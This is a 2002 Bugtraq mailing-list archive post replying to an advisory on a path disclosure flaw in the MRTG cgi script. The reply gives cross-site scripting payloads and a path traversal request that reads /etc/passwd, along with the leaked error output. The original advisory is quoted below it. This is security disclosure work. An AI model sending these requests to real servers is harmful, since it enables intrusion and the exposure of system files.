Bugtraq mailing list archives
Re: Mrtg Path Disclosure Vulnerability
From: "Frog Man" <leseulfrog () hotmail com>
Date: Mon, 04 Feb 2002 21:09:18 +0100
/mrtg.cgi?log=<script>alert('CSS')</script> /mrtg.cgi?log=<script>alert('Cross Site Scripting')</script> /mrtg.cgi?cfg=../../etc/passwd : ------------------- mrtg.cgi error ------------------------ Software error:ERROR: CFG Error Unknown Option "root:PASS:0:0:root:/root" on line 2 or above. Check doc/reference.txt for Help
------------------- mrtg.cgi error ------------------------
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mrtg Path Disclosure Vulnerability Type: Input Validation Error Release Date: February 4, 2002 Product / Vendor: The Multi Router Traffic Grapher (Mrtg) is a tool to monitor the traffic load on network-links. Mrtg generates html pages containing gif images which provide a live visual representation of this traffic. http://www.mrtg.org Summary: If an attacker submits a web request containing unexpected arguments for script variables, an error message will be displayed containing the path to the webroot directory of the server running the Mrtg cgi script. http://host/mrtg.cgi?cfg=blabla Tested: Mrtg v2.090011 Mrtg v2.090006 Vulnerable: Mrtg v2.090011 Mrtg v2.090006 And may be other. Disclaimer: http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory. Author: Tamer Sahin ts () securityoffice net http://www.securityoffice.net Tamer Sahin http://www.securityoffice.net PGP Key ID: 0x2B5EDCB0 Fingerprint: B96A 5DFC E0D9 D615 8D28 7A1B BB8B A453 2B5E DCB0 -----BEGIN PGP SIGNATURE----- Version: PGP 7.1 iQA/AwUBPF3TbLuLpFMrXtywEQIU5QCghYmngYvhwveU+8W3JwTz5QtsmU0AoJZD Tbl6HDhKVnFPEy1DSB3/q3AH =+kUc -----END PGP SIGNATURE-----
_________________________________________________________________Téléchargez MSN Explorer gratuitement à l'adresse http://explorer.msn.fr/intl.asp.
Current thread:
- Mrtg Path Disclosure Vulnerability Tamer Sahin (Feb 04)
- Re: Mrtg Path Disclosure Vulnerability Barney Wolff (Feb 04)
- Re: Mrtg Path Disclosure Vulnerability Dave Ahmad (Feb 04)
- <Possible follow-ups>
- Re: Mrtg Path Disclosure Vulnerability Frog Man (Feb 04)
- Re: Mrtg Path Disclosure Vulnerability Jason Hicks (Feb 10)
- Re: Mrtg Path Disclosure Vulnerability Barney Wolff (Feb 04)